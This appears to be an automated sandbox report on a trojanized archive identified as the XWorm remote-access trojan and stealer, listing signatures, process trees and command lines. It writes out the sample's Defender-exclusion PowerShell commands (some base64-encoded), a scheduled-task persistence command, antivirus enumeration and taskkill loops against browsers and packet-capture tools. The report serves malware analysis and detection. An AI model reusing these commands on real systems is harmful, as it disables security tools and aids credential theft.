Malware Analysis Report

2024-11-16 13:30

Sample ID 240622-crbksaxbjm
Target Tango Release.rar
SHA256 84e74424f9c3409c334e62f98d8325ad7f2c0e39fe7a17cc0aa2bf042d41c11e
Tags
xworm execution persistence pyinstaller rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

84e74424f9c3409c334e62f98d8325ad7f2c0e39fe7a17cc0aa2bf042d41c11e

Threat Level: Known bad

The file Tango Release.rar was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence pyinstaller rat spyware stealer trojan

Detect Xworm Payload

Xworm

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Detects Pyinstaller

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Scheduled Task/Job: Scheduled Task

Suspicious behavior: AddClipboardFormatListener

Uses Task Scheduler COM API

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-22 02:18

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-22 02:18

Reported

2024-06-22 02:20

Platform

win11-20240611-en

Max time kernel

126s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" C:\Users\Admin\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Windows Runtime.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3444 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 3444 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Users\Admin\dllhost.exe
PID 3444 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE
PID 4724 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE
PID 1512 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Roaming\svchost.exe C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe
PID 1932 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1932 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 3512 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2436 wrote to memory of 2976 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 2344 wrote to memory of 2684 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1932 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 4920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2436 wrote to memory of 796 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 5044 wrote to memory of 5076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1932 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 4596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1932 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1012 wrote to memory of 472 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1932 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 2436 wrote to memory of 4636 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4960 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1932 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 928 wrote to memory of 4864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2436 wrote to memory of 3100 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe

"C:\Users\Admin\AppData\Local\Temp\Tango Release\Tango Release V1.6.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AbgBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAeQBxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBuAGUAeAB1AHMAbABvAGEAZABlAHIAOgAgAFIAdQBuACAAQQBzACAAQQBkAG0AaQBuACAASQBmACAASQBuAGoAZQBjAHQAaQBvAG4AIABGAGEAaQBsAHMAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHkAbABiACMAPgA="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAeQB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAcwBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAcQBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcAB5ACMAPgA="

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Users\Admin\dllhost.exe

"C:\Users\Admin\dllhost.exe"

C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE

"C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE"

C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE

"C:\Users\Admin\AppData\Local\Temp\Nyrox V1.4.EXE"

C:\Users\Admin\AppData\Local\Temp\onefile_1512_133634963326468844\ss.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM vivaldi.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

C:\Users\Admin\AppData\Local\Temp\jlesyw.exe

"C:\Users\Admin\AppData\Local\Temp\jlesyw.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\jlesyw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\onefile_4208_133634964036548930\svchost.exe" "--multiprocessing-fork" "parent_pid=916" "pipe_handle=848"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath C:\path\to\exclude"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM yandex.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

